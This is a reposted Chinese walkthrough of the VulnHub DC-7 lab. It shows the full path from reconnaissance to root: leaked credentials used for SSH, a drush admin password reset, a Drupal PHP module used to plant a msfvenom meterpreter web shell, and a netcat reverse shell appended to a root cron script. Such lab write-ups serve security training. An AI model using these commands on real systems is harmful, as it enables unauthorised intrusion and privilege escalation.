vulnhub之DC7靶机

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 vulnhub之DC7靶机,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

介绍

系列: DC(此系列共10台)
发布日期:2019年8月31日
难度:中级
Flag:获取root权限,并拿到唯一的flag
学习:

  • drupal安装php实现挂马
  • 提权

靶机地址:https://www.vulnhub.com/entry/dc-7,356/
从靶场得到提示信息:

  • 靶机更适用Virtualbox
  • 不要尝试爆破,很难成功

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

netdiscover -i eth0 -r 192.168.1.0/24

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.1.125,只开放了22和80端口
在这里插入图片描述

访问网站

得知网站是 drupal 站点,网站首页的提示信息就是不建议我们爆破网站。
在这里插入图片描述

目录扫描没有发现任何有价值的信息,唯一有点意思的是左下角的“@DC7USER”,不知道是个啥玩意,丢谷歌上搜一下,发现了一个推特账号
在这里插入图片描述

得到一个github地址
在这里插入图片描述

经核对,这个github地址就是跟谷歌的第一个搜索结果是一个地址,然后就看到了账号:dc7user、密码:MdR3xOgB7#dW
在这里插入图片描述

尝试登录网站失败
在这里插入图片描述

额,那就只能尝试ssh连接了。然后就连接上了。

SSH登录

信息收集

在这里插入图片描述

唯一引人注目的就是mbox文件。直接查看乱糟糟的,使用mail -f mbox得知邮件共有9封,是以root身份定时运行/opt/scripts/backups.sh脚本得到的。靶场还没有sudo,那就来看看这个脚本是个什么东东吧。
在这里插入图片描述

得到的信息还挺多的
在这里插入图片描述

分析:

  1. 由于此脚本执行的是root权限,所以我们现在只要在脚本里写入反弹shell命令就能得到root权限的shell了
  2. www-data用户具有对该脚本写入的权限,所以我们拿到www-data用户的反弹shell就是root权限的shell
  3. drush命令是drupal系统中特定的管理工具。可以修改www-data用户admin密码

修改web后台密码

修改admin用户密码为admin:drush user-password admin --password="admin"
在这里插入图片描述

登录成功
在这里插入图片描述

挂马

没有找到可以挂马的地方,看了下别人的文章,真是涨了些见识,原来可以安装php来挂马

  1. 发现没有写入php的页面

在这里插入图片描述

  1. 下载php:https://www.drupal.org/project/php/releases/8.x-1.1

在这里插入图片描述

  1. 安装php

在这里插入图片描述

在这里插入图片描述

搜索php定位位置,勾选它,并点击安装
在这里插入图片描述

  1. 开始挂马

由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。

生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php

开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.118
exploit
  1. 投放木马

在这里插入图片描述

  1. getshell

在这里插入图片描述

提权

反弹shell:echo 'nc -e /bin/bash 192.168.1.118 4444' >> /opt/scripts/backups.sh
kali开启监听:nc -nvlp 4444
由于脚本是每个15分钟运行一次,坐等15分钟吧

  1. 确认命令写入成功

在这里插入图片描述

  1. 听会歌,然后看到建立了nc连接

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134243.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!